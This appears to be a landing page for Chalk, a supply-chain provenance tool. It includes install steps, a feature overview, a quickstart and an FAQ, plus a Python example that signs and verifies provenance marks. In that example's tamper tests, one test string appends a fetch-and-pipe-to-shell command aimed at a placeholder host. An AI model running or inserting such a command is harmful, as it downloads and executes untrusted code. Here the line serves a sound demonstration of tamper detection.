
Chalk

GPS for your software. Chalk adds provenance metadata into any build artifact so you always know where it came from and where it gets deployed. One CLI, 5 lines of YAML in CI/CD, complete supply chain visibility.

# Download the latest Chalk binary
curl -fsSL https://github.com/crashappsec/chalk/releases/latest/download/chalk-$(uname -s)-$(uname -m) -o chalk
chmod +x chalk
# Note: this fetches whatever the newest release is, with no checksum or
# signature check of its own; inspect the download before installing it system-wide
sudo mv chalk /usr/local/bin/

# Verify installation
chalk version
5 lines of YAML in CI/CD
1 CLI to mark & extract
GPL open source license
0 external dependencies
Why Chalk

Complete supply chain observability

Know exactly what you built, how you built it, and where it's running. Chalk gives you provenance, SBOMs, and runtime monitoring in a single tool.

Chalk Mark Insertion

Embed provenance metadata directly into your build artifacts: binaries, containers, scripts, and more. Chalk marks travel with the artifact, not in a sidecar database.

Chalk Mark Extraction

Extract chalk marks from any artifact to answer 'where did this come from?' Retrieve the full build context, commit hash, builder identity, and CI/CD metadata.

SBOM Generation

Automatically generate Software Bills of Materials during builds. Chalk produces CycloneDX SBOMs embedded in or alongside your artifacts for supply chain transparency.

Runtime Heartbeat

Monitor deployed artifacts in production with periodic heartbeat reporting. Know exactly what versions are running, where, and when they were last seen.

CI/CD Integration

Add chalk to any CI/CD pipeline with 5 lines of YAML. Works with GitHub Actions, GitLab CI, Jenkins, CircleCI, and any system that runs shell commands.

Digital Signatures & Provenance

Cryptographically sign chalk marks so that anyone who extracts a mark can check that it has not been altered and that it was produced by the holder of the signing key. Full code provenance tracking from source commit through build to deployment.

How Chalk works

Build. Mark. Deploy. Monitor.

1. Build an artifact (binary, container, script).
2. chalk insert embeds provenance metadata and an SBOM into the artifact.
3. chalk extract retrieves the chalk mark from any artifact, wherever it has been deployed.
4. Reporting: chalk reports, runtime heartbeats and SBOMs flow back from build and production.

Chalk lifecycle — from build through production
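The insert, extract and verify cycle in the lifecycle above, as an added worked example that is not Chalk's code and does not use Chalk's real on-disk mark format. It appends a single trailer line (the prefix is an assumption) carrying provenance fields borrowed from the page, a SHA-256 of the unmarked content, and an HMAC under a constructed demo key that stands in for a real signature. What it adds to the diagram is the check a practitioner wants at extraction time: an unsigned mark is self-asserted text anyone can edit, and a signature over the mark alone still misses edits to the artifact body, so the mark has to bind to a hash of the content it describes.

```python
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Assumed trailer format: one comment line appended to the artifact.
# Chalk's real mark format is different; this is only an illustration.
MARK_PREFIX = b"# PROVENANCE-MARK: "

# Constructed inputs for the demo.
SAMPLE_SCRIPT = b"#!/bin/sh\necho 'hello from build 42'\n"
DEMO_KEY = b"demo-signing-key"       # stand-in for a real signing key
DEMO_PROVENANCE = {                  # field names mirror those shown on the page
    "ORIGIN_URI": "git@github.com:myorg/myrepo.git",
    "COMMIT_ID": "a1b2c3d",
    "BRANCH": "main",
    "BUILDER": "github-actions",
}


def _canonical(mark: dict) -> bytes:
    """Deterministic encoding so signer and verifier MAC identical bytes."""
    return json.dumps(mark, sort_keys=True, separators=(",", ":")).encode()


def _locate_mark(artifact: bytes) -> Optional[Tuple[int, int]]:
    """Return (start, end) byte offsets of the last mark line, or None."""
    if artifact.startswith(MARK_PREFIX):
        start = 0
    else:
        nl = artifact.rfind(b"\n" + MARK_PREFIX)
        if nl == -1:
            return None
        start = nl + 1
    end = artifact.find(b"\n", start)
    end = len(artifact) if end == -1 else end + 1   # include the mark's own newline
    return start, end


def strip_mark(artifact: bytes) -> bytes:
    """Artifact with the mark line removed. Bytes after the mark are kept,
    so content buried behind a mark still counts as a content change."""
    loc = _locate_mark(artifact)
    if loc is None:
        return artifact
    start, end = loc
    return artifact[:start] + artifact[end:]


def insert_mark(artifact: bytes, provenance: dict, key: bytes) -> bytes:
    """Append a mark with provenance, a hash of the unmarked content, and an
    HMAC over both (a production system would use a real signature scheme)."""
    base = strip_mark(artifact)            # re-marking replaces an old mark
    if not base.endswith(b"\n"):
        base += b"\n"
    mark = dict(provenance)
    mark["ARTIFACT_HASH"] = hashlib.sha256(base).hexdigest()
    mark["SIGNATURE"] = hmac.new(key, _canonical(mark), hashlib.sha256).hexdigest()
    return base + MARK_PREFIX + _canonical(mark) + b"\n"


def extract_mark(artifact: bytes) -> Optional[dict]:
    """Read the mark back out of the artifact without checking it."""
    loc = _locate_mark(artifact)
    if loc is None:
        return None
    start, end = loc
    return json.loads(artifact[start + len(MARK_PREFIX):end].rstrip(b"\n"))


def verify_mark(artifact: bytes, key: bytes) -> Tuple[bool, str]:
    """Check the mark's MAC first, then that the content it describes is the
    content actually present in the artifact."""
    mark = extract_mark(artifact)
    if mark is None:
        return False, "no mark present"
    sig = mark.pop("SIGNATURE", None)
    if sig is None:
        return False, "mark is unsigned"
    expected = hmac.new(key, _canonical(mark), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False, "signature mismatch: mark altered or signed with another key"
    if mark.get("ARTIFACT_HASH") != hashlib.sha256(strip_mark(artifact)).hexdigest():
        return False, "artifact content changed after marking"
    return True, "ok"


def demo() -> dict:
    """Mark the sample script, then verify it under several tampering scenarios."""
    marked = insert_mark(SAMPLE_SCRIPT, DEMO_PROVENANCE, DEMO_KEY)
    return {
        "clean": verify_mark(marked, DEMO_KEY),
        "body_changed": verify_mark(marked.replace(b"hello", b"pwned"), DEMO_KEY),
        "mark_changed": verify_mark(
            marked.replace(b'"COMMIT_ID":"a1b2c3d"', b'"COMMIT_ID":"deadbee"'), DEMO_KEY),
        "appended": verify_mark(marked + b"curl http://example.invalid | sh\n", DEMO_KEY),
        "wrong_key": verify_mark(marked, b"some-other-key"),
        "unmarked": verify_mark(SAMPLE_SCRIPT, DEMO_KEY),
    }


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:13s} {'PASS' if ok else 'FAIL'}  {reason}")
```

Run it directly to see all six scenarios. The "appended" case is the one worth studying: a trailer mark is easy to bury under extra bytes, which is why strip_mark keeps anything behind the mark as content and the hash check catches it, while the MAC alone would not.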

5-minute quickstart

From install to first chalk mark

Download the binary. Point it at your build. Every artifact now carries its own provenance. No config files, no cloud account, no vendor lock-in.

Full documentation →
1. Install Chalk

$ brew install crashappsec/tap/chalk
✓ chalk installed successfully

2. Chalk your build artifact

$ chalk insert ./my-binary
Chalk mark inserted into ./my-binary
  commit:  a1b2c3d
  builder: github-actions
  time:    2026-03-17T10:42:00Z

3. Extract the chalk mark later

$ chalk extract ./my-binary
CHALK_ID:    f8e7d6c5-b4a3-9281-0fed-cba987654321
ORIGIN_URI:  git@github.com:myorg/myrepo.git
COMMIT_ID:   a1b2c3d
BRANCH:      main

Using Chalk in production?

The Crash Override platform adds deep build inspection

Enterprise builds on Chalk with centralized visibility across all your repositories, deep build inspection, policy enforcement, team management, SSO/RBAC, audit logs, and dedicated support from our engineering team.

Deep build inspection
SSO + RBAC + audit logs
Org-wide supply chain visibility

Frequently asked questions

What is a chalk mark?

A chalk mark is a small piece of provenance metadata that Chalk embeds directly into a build artifact (binary, container image, or script) at build time. It contains information like the source commit, build timestamp, builder identity, and CI/CD context. Think of it as a GPS tag for your software. It tells you where the artifact came from and how it was built, and travels with the artifact wherever it goes.

Is Chalk free to use?

Yes. Chalk is GPL licensed and completely free. The GPL license ensures that modifications to Chalk itself remain open source. You can use Chalk to mark your proprietary software without any license implications for your own code. The GPL applies to Chalk, not the artifacts it marks.

How does Chalk relate to the Crash Override platform?

Chalk is the open-source CLI tool that inserts and extracts chalk marks, generates SBOMs, and provides runtime heartbeat monitoring. The Crash Override platform builds on top of Chalk to add deep build inspection, centralized visibility across all your repositories, team management, policy enforcement, and enterprise integrations. If you need a single-repo CLI tool, Chalk alone works great. If you need organization-wide supply chain visibility, the platform adds that layer.

Which artifact types does Chalk support?

Chalk works with ELF binaries, Mach-O binaries, PE executables, Docker/OCI container images, Python scripts, shell scripts, and ZIP archives. For containers, Chalk can mark both the image layers and the build metadata. The artifact type is detected automatically; just point Chalk at your build output.

How can I contribute?

Fork the repository at github.com/crashappsec/chalk, make your changes, and open a pull request. Check the CONTRIBUTING.md file for development setup, coding standards, and testing requirements. Good first issues are tagged on GitHub if you're looking for a place to start.

Mark your first artifact in under 5 minutes

Download the binary, point it at your build, and every artifact carries its own provenance. No account required.